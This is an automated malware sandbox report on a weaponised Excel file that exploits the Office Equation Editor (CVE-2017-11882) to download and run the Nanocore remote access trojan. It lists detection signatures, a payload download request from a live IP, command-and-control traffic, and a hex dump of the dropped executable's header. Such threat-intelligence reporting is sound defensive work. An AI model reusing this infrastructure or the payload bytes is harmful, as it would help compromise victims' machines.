Windows Analysis Report Enclosed.xlsx

Overview

General Information

Sample Name: Enclosed.xlsx
Analysis ID: 483371
MD5: 307b2db43e9e3b04e429cdd9d7df08ad
SHA1: 58a8d2e79a4984c457f779c34e6a3147a2a66d3f
SHA256: d902487a332eb4be203d196abe75aa72b2fed223df29fb3112aa27e5b54109df
Tags: VelvetSweatshop, xlsx
Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to launch a process as a different user
Stores files to the Windows start menu directory
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

AV Detection:

Multi AV Scanner detection for submitted file
Source: Enclosed.xlsx ReversingLabs: Detection: 29%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Metadefender: Detection: 13%
Yara detected Nanocore RAT
Source: Yara match File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 9.2.sys30.exe.560000.3.unpack Avira: Label: TR/NanoCore.fadte
Source: 9.2.sys30.exe.70000.0.unpack Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.google.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 6_2_0038DB3F
Source: C:\Users\Public\vbc.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 6_2_0038BC70
Source: C:\Users\Public\vbc.exe Code function: 4x nop then jmp 00384610h 6_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then mov dword ptr [ebp-40h], 00000001h 7_2_0038D750
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 7_2_0038BC70
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then jmp 00384610h 7_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then jmp 00C29F46h 7_2_00C29E08
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then jmp 00C2B4CCh 7_2_00C2B338
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then jmp 00C29F46h 7_2_00C29DF9
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then jmp 00C2B4CCh 7_2_00C2B328
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 9_2_0062F300
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 9_2_0062F2FD
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 9_2_00629A02
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001D0797h 11_2_001D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001D0797h 11_2_001D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001C0797h 12_2_001C0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001C0797h 12_2_001C0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00330797h 13_2_00330560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00330797h 13_2_00330550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001F0797h 14_2_001F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001F0797h 14_2_001F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00210797h 15_2_00210560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00210797h 15_2_00210550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 003A0797h 16_2_003A0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 003A0797h 16_2_003A0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 002E0797h 17_2_002E0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 002E0797h 17_2_002E0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001E0797h 18_2_001E0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001E0797h 18_2_001E0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001D0797h 19_2_001D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 001D0797h 19_2_001D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00690797h 20_2_00690560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00690797h 20_2_00690550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00450797h 21_2_00450560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00450797h 21_2_00450550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00250797h 22_2_00250560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00250797h 22_2_00250550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 003F0797h 23_2_003F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 003F0797h 23_2_003F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00190797h 24_2_00190560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00190797h 24_2_00190550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 002F0797h 25_2_002F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 002F0797h 25_2_002F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 002D0797h 26_2_002D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 002D0797h 26_2_002D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00280797h 27_2_00280560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00280797h 27_2_00280550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00320797h 28_2_00320560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00320797h 28_2_00320550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 002C0797h 29_2_002C0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 002C0797h 29_2_002C0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00220797h 30_2_00220560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Code function: 4x nop then jmp 00220797h 30_2_00220550
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 13.238.159.178:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.217.168.36:443
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49182 -> 194.5.98.103:5230
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49183 -> 194.5.98.103:5230
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 19:48:11 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Tue, 14 Sep 2021 18:45:13 GMTETag: "a2e00-5cbf8fb685aa3"Accept-Ranges: bytesContent-Length: 667136Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 60 7f 18 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 24 0a 00 00 08 00 00 00 00 00 00 ce 43 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 43 0a 00 4b 00 00 00 00 60 0a 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 23 0a 00 00 20 00 00 00 24 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 04 04 00 00 00 60 0a 00 00 06 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0a 00 00 02 00 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 43 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ec 08 00 e4 56 01 00 03 00 02 00 47 00 00 06 b8 
79 01 00 e0 6b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 20 9c 01 00 00 8d 01 00 00 01 25 d0 64 01 00 04 28 01 00 00 0a 80 65 01 00 04 20 94 00 00 00 8d 05 00 00 01 25 d0 66 01 00 04 28 01 00 00 0a 80 67 01 00 04 2a 1e 02 28 02 00 00 0a 2a 26 00 02 28 05 00 00 0a 00 2a ce 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 73 0a 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 0e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 0f 00 00 0a 0a 2b 00 06 2a 1b 30 05 00 ff 00 00 00 06 00 00 11 00 02 8c 06 00 00 1b 2c 0f 0f 00 fe 16 06 00 00 1b 6f 14 00
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49170 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /truth/vbc.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 13.238.159.178 Connection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 194.5.98.103:5230
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000006.00000002.519010155.00000000005A1000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685487329.000000000061D000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: sys30.exe, 00000008.00000002.524078956.0000000002ACA000.00000004.00000001.sdmp String found in binary or memory: http://dual-a-0001.dc-msedge.net
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp String found in binary or memory: http://n.f
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.520252057.000000000518C000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.c/s
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobede
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp String found in binary or memory: http://ns.ao
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
